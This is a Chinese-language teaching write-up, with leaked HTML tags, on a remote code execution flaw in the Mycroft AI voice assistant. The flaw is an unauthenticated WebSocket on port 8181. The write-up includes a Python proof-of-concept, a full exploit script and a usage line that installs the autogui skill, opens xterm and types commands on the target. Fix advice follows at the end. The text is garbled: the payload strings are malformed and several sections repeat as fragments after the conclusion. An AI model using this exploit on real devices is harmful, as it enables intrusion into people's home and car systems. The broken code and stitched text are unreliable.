Mycroft AI 远程代码执行漏洞分析与利用教学文档<\/h1>

1. Mycroft AI 简介<\/h2>

Mycroft AI 是一款开源且基于人工智能的语音助理应用，与 Amazon Echo 和 Google Home 类似。主要特点：<\/p>

2015年开始众筹生产 Mark-I 和 Mark-II 代产品<\/li>
基于 Linux Desktop\/Server 和 Raspberry PI 架构<\/li>
广泛应用于智能自动化家居系统<\/li>

新款应用将应用于捷豹和路虎的某些车型<\/li> <\/ul>

2. 漏洞发现背景<\/h2>
在 Arch Linux 社区开源软件包的开发贡献过程中，研究者发现了 Mycroft AI 存在一个无需点击交互即可实现的远程代码执行漏洞(RCE)。<\/p>

3. 漏洞技术分析<\/h2>

3.1 WebSocket 服务端未授权访问<\/h3>

关键代码片段：<\/p>

host =<\/span> config.<\/span>get("host"<\/span>)
<\/span><\/span>port =<\/span> config.<\/span>get("port"<\/span>)
<\/span><\/span>route =<\/span> config.<\/span>get("route"<\/span>)
<\/span><\/span>validate_param(host, "websocket.host"<\/span>)
<\/span><\/span>validate_param(port, "websocket.port"<\/span>)
<\/span><\/span>validate_param(route, "websocket.route"<\/span>)
<\/span><\/span>routes =<\/span> [(route, WebsocketEventHandler)]
<\/span><\/span>application =<\/span> web.<\/span>Application(routes, **<\/span>settings)
<\/span><\/span>application.<\/span>listen(port, host)
<\/span><\/span>ioloop.<\/span>IOLoop.<\/span>instance().<\/span>start()
<\/span><\/span><\/code><\/pre>配置文件 mycroft.conf 中的 WebSocket 设置：<\/p>
"websocket"<\/span>:<\/span> {
<\/span><\/span>    "host"<\/span>: "0.0.0.0"<\/span>,
<\/span><\/span>    "port"<\/span>: 8181<\/span>,
<\/span><\/span>    "route"<\/span>: "\/core"<\/span>,
<\/span><\/span>    "ssl"<\/span>: false<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题<\/strong>：WebSocket 服务端默认监听在 0.0.0.0:8181\/core，且没有任何身份验证机制。<\/p>
3.2 漏洞验证测试<\/h3>
简单的 Python 脚本测试：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>import<\/span> asyncio
<\/span><\/span>import<\/span> websockets
<\/span><\/span>
<\/span><\/span>uri =<\/span> "ws:\/\/myserver:8181\/core"<\/span>
<\/span><\/span>command =<\/span> "say pwned"<\/span>
<\/span><\/span>
<\/span><\/span>async<\/span> def<\/span> sendPayload<\/span>():
<\/span><\/span>    async<\/span> with<\/span> websockets.<\/span>connect(uri) as<\/span> websocket:
<\/span><\/span>        await<\/span> websocket.<\/span>send("{<\/span>\"<\/span>data<\/span>\"<\/span>: {<\/span>\"<\/span>utterances\command+type<\/span>\"<\/span>: <\/span>\"<\/span>recognizer_loop:utterance<\/span>\"<\/span>, <\/span>\"<\/span>context<\/span>\"<\/span>: null}"<\/span>)
<\/span><\/span>
<\/span><\/span>asyncio.<\/span>get_event_loop().<\/span>run_until_complete(sendPayload())
<\/span><\/span><\/code><\/pre>这个脚本可以让 Mycroft AI 说出 "pwned"，证明可以远程控制设备发声。<\/p>
4. Mycroft AI 技能系统分析<\/h2>
4.1 技能组成元素<\/h3>
一个 Mycroft 技能通常包含以下文件：<\/p>

dialog\/en-us\/command.dialog<\/code> - 包含能触发技能的语音命令<\/li>
vocab\/en-us\/answer.voc<\/code> - 包含 Mycroft 发声的答案<\/li>
requirements.txt<\/code> - 包含由 pip 安装的技能所需包<\/li>
__init__.py<\/code> - 包含技能的主函数和触发执行时需要加载的命令<\/li>
<\/ol>
4.2 利用技能系统执行代码<\/h3>
理论上可以创建一个恶意技能，在被触发后执行任意代码。但存在以下限制：<\/p>

需要通过语音命令触发<\/li>
技能链接 URL 可能需要被在线网站白名单化<\/li>
<\/ul>
5. 实际利用方法<\/h2>
5.1 利用现有技能<\/h3>
研究发现一个名为 skill-autogui<\/code> 的有趣技能，其主要功能是对鼠标键盘的控制，可以用来实现代码执行。<\/p>
5.2 漏洞利用 PoC<\/h3>
完整的漏洞利用脚本：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> asyncio
<\/span><\/span>import<\/span> websockets
<\/span><\/span>import<\/span> time
<\/span><\/span>
<\/span><\/span>cmds =<\/span> ["mute audio"<\/span>] +<\/span> sys.<\/span>argv[1<\/span>:]
<\/span><\/span>uri =<\/span> "ws:\/\/myserver:8181\/core"<\/span>
<\/span><\/span>
<\/span><\/span>async<\/span> def<\/span> sendPayload<\/span>():
<\/span><\/span>    for<\/span> payload in<\/span> cmds:
<\/span><\/span>        async<\/span> with<\/span> websockets.<\/span>connect(uri) as<\/span> websocket:
<\/span><\/span>            await<\/span> websocket.<\/span>send("{<\/span>\"<\/span>data<\/span>\"<\/span>: {<\/span>\"<\/span>utterances\payload+type<\/span>\"<\/span>: <\/span>\"<\/span>recognizer_loop:utterance<\/span>\"<\/span>, <\/span>\"<\/span>context<\/span>\"<\/span>: null}"<\/span>)
<\/span><\/span>        time.<\/span>sleep(1<\/span>)
<\/span><\/span>
<\/span><\/span>asyncio.<\/span>get_event_loop().<\/span>run_until_complete(sendPayload())
<\/span><\/span><\/code><\/pre>使用示例：<\/p>
python pwn.py "install autogui"<\/span> "open xterm"<\/span> "type echo pwned"<\/span> "press enter"<\/span>
<\/span><\/span><\/code><\/pre>这个命令序列会在远程 Mycroft 设备的 Linux 系统上执行命令：<\/p>

安装 autogui 技能<\/li>
打开 xterm 终端<\/li>
输入命令 "echo pwned"<\/li>
按下回车执行<\/li>
<\/ol>
6. 漏洞影响范围<\/h2>
所有搭载 Mycroft 且 WebSocket 服务端暴露在网的设备：<\/p>

Mark-I 代应用的 WebSocket 接口默认在防火墙之后，受影响较小<\/li>
其他版本如果 WebSocket 服务暴露，则全部受影响<\/li>
<\/ul>
7. 漏洞修复建议<\/h2>

为 WebSocket 服务端添加身份验证机制<\/li>
默认情况下不应将 WebSocket 服务绑定到 0.0.0.0<\/li>
对技能安装来源实施严格的白名单控制<\/li>
限制危险技能的安装和使用<\/li>
<\/ol>
8. 参考资源<\/h2>

GitHub 相关讨论<\/li>
FreeBuf 原始文章<\/li>
<\/ul>

这份文档详细分析了 Mycroft AI 的远程代码执行漏洞，从发现过程、技术原理到实际利用方法都进行了全面说明，可以作为安全研究和漏洞修复的参考。<\/p>

Mycroft AI 远程代码执行漏洞分析与利用教学文档<\/h1>

2. 漏洞发现背景<\/h2> 在 Arch Linux 社区开源软件包的开发贡献过程中，研究者发现了 Mycroft AI 存在一个无需点击交互即可实现的远程代码执行漏洞(RCE)。<\/p>

3. 漏洞技术分析<\/h2>

4. Mycroft AI 技能系统分析<\/h2>

5. 实际利用方法<\/h2>

5.1 利用现有技能<\/h3> 研究发现一个名为 skill-autogui<\/code> 的有趣技能，其主要功能是对鼠标键盘的控制，可以用来实现代码执行。<\/p>

8. 参考资源<\/h2> GitHub 相关讨论<\/li> FreeBuf 原始文章<\/li> <\/ul> 这份文档详细分析了 Mycroft AI 的远程代码执行漏洞，从发现过程、技术原理到实际利用方法都进行了全面说明，可以作为安全研究和漏洞修复的参考。<\/p>

2. 漏洞发现背景<\/h2>
在 Arch Linux 社区开源软件包的开发贡献过程中，研究者发现了 Mycroft AI 存在一个无需点击交互即可实现的远程代码执行漏洞(RCE)。<\/p>

5.1 利用现有技能<\/h3>
研究发现一个名为 `skill-autogui<\/code> 的有趣技能，其主要功能是对鼠标键盘的控制，可以用来实现代码执行。<\/p>`

8. 参考资源<\/h2>

GitHub 相关讨论<\/li>
FreeBuf 原始文章<\/li> <\/ul>

这份文档详细分析了 Mycroft AI 的远程代码执行漏洞，从发现过程、技术原理到实际利用方法都进行了全面说明，可以作为安全研究和漏洞修复的参考。<\/p>